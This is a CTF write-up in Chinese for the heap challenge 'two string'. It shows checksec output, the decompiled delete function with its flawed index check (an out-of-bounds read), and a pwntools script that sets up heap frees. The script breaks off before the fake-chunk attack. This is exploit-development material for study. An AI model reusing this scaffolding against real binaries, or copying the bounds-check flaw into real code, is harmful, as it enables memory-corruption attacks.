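# two string

Posted on 2019-08-15 | In 网络信息安全专项赛

## 0x01 寻找漏洞

```
RELRO           STACK CANARY      NX            PIE
Partial RELRO   Canary found      NX enabled    No PIE
```

具体步骤在 uaf 实例（差不多的题目），这里直接简单解题。

漏洞函数（menu 3，delete string）：

```c
int sub_E56()
{
  int v1; // [rsp+Ch] [rbp-4h]

  printf("Please input index : ");
  v1 = sub_BE4();
  // Defect as decompiled: `&&` binds tighter than `||`, and for every negative
  // v1 the unsigned compare is always true, so the range check only rejects
  // negative indices. Any v1 >= 32 passes and qword_202040[v1] is read past
  // the 32-entry table. The intended check is
  //   if ( (unsigned int)v1 > 0x1F || !qword_202040[v1] )
  if ( v1 < 0 && (unsigned int)v1 > 0x1F || !qword_202040[v1] )
    return puts("Index error!");
  free((void *)*qword_202040[v1]);   // frees the first 8 bytes of the entry as a pointer
  free(qword_202040[v1]);
  qword_202040[v1] = 0LL;            // slot is cleared: delete itself leaves no dangling pointer in the table
  return puts("Delete success!");
}
```

原文把这里标为 uaf 漏洞。从上面这段 delete 代码能直接确认的是索引越界：`v1 >= 32` 时检查失效。释放后 `qword_202040[v1]` 被清零，所以悬垂指针并不是 delete 本身留下的；UAF 是否存在需要在其他函数（merge string 等）中确认，本页没有给出那部分代码。

```
xfgg@ubuntu:~/Desktop$ ./pwn
1. create string
2. display string
3. delete string
4. merge string
5. merge strings
6. exit
>>> 1
Please enter the size of string : 2
Please enter the string : 1
```

create string 的结构（原文写的是 `int string`，但 delete 中 `free(*qword_202040[v1])` 把条目开头 8 字节当作指针释放，所以这个字段是指针，而且从 delete 看它位于偏移 0；具体布局需在 create 函数中核对）：

```c
struct player {
    int   size;
    char *string;   // heap pointer, freed by delete; layout/offset to be confirmed in create
};
```

## 0x02 思路分析

编写 dynelf 查看内存结构。先写好三个菜单操作的封装：`recvuntil` 必须和程序真实输出一致（菜单提示是 `>>> `，提示串冒号前有空格），否则会一直阻塞。

```python
def create_string(size, string):
    """Menu option 1: allocate a `size`-byte string and fill it with `string`."""
    p.recvuntil(">>> ")
    p.sendline("1")
    p.recvuntil("size of string : ")
    p.sendline(str(size))
    p.recvuntil("the string : ")
    p.sendline(string)


def display_string(index):
    """Menu option 2: print the string at `index`."""
    p.recvuntil(">>> ")
    p.sendline("2")
    p.recvuntil("index")  # exact prompt for option 2 is not shown on this page; confirm against the binary
    p.sendline(str(index))


def delete_string(index):
    """Menu option 3: free the string at `index` (sub_E56 above)."""
    p.recvuntil(">>> ")
    p.sendline("3")
    p.recvuntil("index : ")
    p.sendline(str(index))


create_string(32, 'aaa')
create_string(32, 'bbb')
delete_string(1)
delete_string(0)
```

free 掉创建的两个 string，接下来就要构造 fake chunk 进行攻击。

## 0x03 exp

原文脚本有几处跑不起来的地方：`def` 缺少冒号，`delete(1)` 调用的函数并不存在（定义的是 `delete_string`），`recvuntil(' of string:')` 这类模式与程序实际输出（冒号前有空格）不匹配。修正后：

```python
from pwn import *

p = process('/home/xfgg/pwn')
elf = ELF('/home/xfgg/pwn')


def create_string(size, string):
    """Menu option 1: allocate a `size`-byte string and fill it with `string`."""
    p.recvuntil(">>> ")
    p.sendline("1")
    p.recvuntil("size of string : ")
    p.sendline(str(size))
    p.recvuntil("the string : ")
    p.sendline(string)


def display_string(index):
    """Menu option 2: print the string at `index`."""
    p.recvuntil(">>> ")
    p.sendline("2")
    p.recvuntil("index")  # exact prompt for option 2 is not shown on this page; confirm against the binary
    p.sendline(str(index))


def delete_string(index):
    """Menu option 3: free the string at `index` (sub_E56 above)."""
    p.recvuntil(">>> ")
    p.sendline("3")
    p.recvuntil("index : ")
    p.sendline(str(index))


create_string(32, 'aaa')
create_string(32, 'bbb')
delete_string(1)
delete_string(0)
# The original page is truncated here ("magic"); the fake-chunk construction
# that follows the two frees is not shown.
```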